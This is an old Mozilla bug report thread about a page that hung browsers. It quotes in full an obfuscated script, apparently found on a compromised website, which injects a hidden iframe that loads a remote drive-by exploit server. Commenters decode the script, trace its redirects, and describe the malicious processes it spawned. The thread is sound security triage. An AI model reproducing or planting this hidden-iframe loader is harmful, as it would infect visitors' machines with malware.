Closed
Bug 406124
Opened 18 years ago
Closed 14 years ago
The vulnerability in JavaScript
Categories
(Core :: JavaScript Engine, defect)
Tracking
()
RESOLVED
INCOMPLETE
People
(Reporter: cobalt.sunman, Unassigned)
Details
Attachments
(1 file)
|
18.95 KB,
application/octet-stream
|
Details |
User-Agent: Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.8.1.10) Gecko/20071115 Firefox/2.0.0.10
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.8.1.10) Gecko/20071115 Firefox/2.0.0.10
The vulnerability in JavaScript
After loading the following code, the system hangs. Apparatus required rebooting.
Please spruced, further code can spoil your system!
<!-- o65 --><Script Language='Javascript'>
<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%6C%74%72%61%66%66%69%63%2E%62%69%7A%2F%72%65%73%6F%75%72%63%65%2E%70%68%70%3F%69%64%3D%34%35%36%38%26%75%73%65%72%3D%67%6F%6F%67%6C%65%74%6F%70%31%30%30%27%20%77%69%64%74%68%3D%27%31%27%20%68%65%69%67%68%74%3D%27%31%27%20%73%74%79%6C%65%3D%27%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%27%3E%3C%2F%69%66%72%61%6D%65%3E'));
//-->
</script><!-- c65 -->
Reproducible: Sometimes
Steps to Reproduce:
1.
2.
3.
Saves disable JavaScript
Status: UNCONFIRMED → RESOLVED
Closed: 18 years ago
Resolution: --- → FIXED
|
||
Comment 2•18 years ago
|
||
I ran this code in Firefox 2.0.0.10 on a fully patched Windows XP virtual machine. The result was that Firefox started using over 1.5GB of virtual memory, and spawned new processes visible from task manager: "~.exe", and "_svchost.exe"
This eventually redirects to http://www.sffglkjszf.com/check/version.php?t=565 . The domain appears to be down.
|
||
Comment 3•18 years ago
|
||
The bit in comment 0 creates an iframe and loads
http://ltraffic.biz/resource.php?id=4568&user=googletop100
That returns a 302 redirect to
http://sffglkjszf.com/check/version.php?t=565
Which now returns no content.
This isn't "FIXED" so much as "evidence is gone", updating resolution
Resolution: FIXED → INCOMPLETE
Please spruced, further code can spoil your system!
>>http://209.85.135.104/search?q=cache:NBoDp6nREE0J:www.pogruzchikservice.ru/+%D0%B1%D0%B0%D0%BB%D0%BA%D0%B0%D0%BD%D0%BA%D0%B0%D1%80%D0%B0%D1%81%D0%B5%D1%80%D0%B2%D0%B8%D1%81&hl=ru&ct=clnk&cd=1&gl=ru
Google cache Here, in this page-embedded code that exploits the vulnerability. All browsers are vulnerable-opera ie firefox konqueror tested on the following systems, Windows 2003 server SP1, Windows XP SP2, Linux 2.6.22 (Gentoo) / Windows BSOD often shows. Linux hangs for a while. If there is the memory of more than 2Gb on Linux systems process quietly.
|
|
||
Comment 5•18 years ago
|
||
The cached google page contained 7 IFRAMEs, each of which loaded exploits. I have attached them in a .zip file, along with the page that included the IFRAMEs.
|
||
Updated•18 years ago
|
Component: Tabbed Browser → JavaScript Engine
Product: Firefox → Core
QA Contact: tabbed.browser → general
|
|
||
Comment 6•18 years ago
|
||
Reopening, as there's an attachment with example code now.
Status: RESOLVED → UNCONFIRMED
Resolution: INCOMPLETE → ---
Using Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b1pre) Gecko/20080909032504 Minefield/3.1b1pre
n14041.htm
404-pg N O T ------------------------------ F O U N D ! ! ! TRY LATER
n14042.htm
404-pg N O T ------------------------------ sorry. please check url.
Error: 404 F O U N D ! ! ! TRY LATER
n14043.htm
404-pg N O T ------------------------------ F O U N D ! ! ! TRY LATER
n14044.htm
404-pg N O T ------------------------------ aijsah F O U N D ! ! ! TRY LATER
n14046.htm
100% CPU usage
n14047.htm
404-pg N O T ------------------------------ F O U N D ! ! ! TRY LATER
n14048.htm
404-pg N O T ------------------------------
F O U N D ! ! ! TRY LATER
|
|
||
Comment 8•14 years ago
|
||
None of the STR do anything for me in current nightly.
Status: UNCONFIRMED → RESOLVED
Closed: 18 years ago → 14 years ago
Resolution: --- → INCOMPLETE
You need to log in
before you can comment on or make changes to this bug.
Description
•